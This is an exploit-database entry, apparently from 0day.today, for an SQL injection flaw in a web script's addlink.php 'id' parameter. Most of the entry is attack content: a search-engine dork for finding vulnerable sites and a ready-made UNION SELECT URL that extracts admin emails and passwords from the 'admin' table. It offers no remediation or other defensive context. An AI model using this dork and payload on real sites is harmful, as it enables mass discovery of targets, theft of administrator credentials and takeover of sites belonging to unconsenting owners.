id: 10552
date: 12/31/2009
title: list Web (addlink.php id) Remote SQL Injection Vulnerability
author: Hussin X
cves: 

============================================================
list Web (addlink.php id) Remote SQL Injection Vulnerability
============================================================

|___________________________________________________
|                                                                                                     |
|
| script : http://maker.ir
|
| DorK   : inurl:"ir/addlink.php?id=" or inurl:"addlink.php?id="
|___________________________________________________|
 
Exploit:
________
 
 
www.[target].com/Script/addlink.php?id=-0+union+select+1,concat(email,0x3e,password),3,4+from+admin--



#  0day.today [2023-03-25]  #